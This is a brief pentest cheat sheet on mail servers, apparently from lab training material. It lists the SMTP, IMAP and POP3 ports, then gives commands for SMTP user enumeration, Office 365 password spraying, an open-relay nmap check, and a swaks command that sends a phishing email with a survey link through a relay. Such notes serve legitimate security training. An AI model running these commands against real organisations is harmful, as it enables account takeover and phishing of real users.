MX: Mail eXchanger
| Port | Service |
|---|---|
TCP/25 |
SMTP Unencrypted |
TCP/143 |
IMAP4 Unencrypted |
TCP/110 |
POP3 Unencrypted |
TCP/465 |
SMTP Encrypted |
TCP/587 |
SMTP Encrypted/STARTTLS |
TCP/993 |
IMAP4 Encrypted |
TCP/995 |
POP3 Encrypted |
To automate user enumeration: https://github.com/pentestmonkey/smtp-user-enum
Example:
smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7
Office 365 information gathering and user enumeration: https://github.com/0xZDH/o365spray
For password spraying:
python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz
nmap -p25 -Pn --script smtp-open-relay 10.10.11.213
swaks --from [email protected] --to [email protected] --header 'Subject: Company Notification' --body 'Hi All, we want to hear from you! Please complete the following survey. <http://mycustomphishinglink.com/>' --server 10.10.11.213
smtp-user-enum -M RCPT -U users.list -D inlanefreight.htb -t 10.129.203.12 -v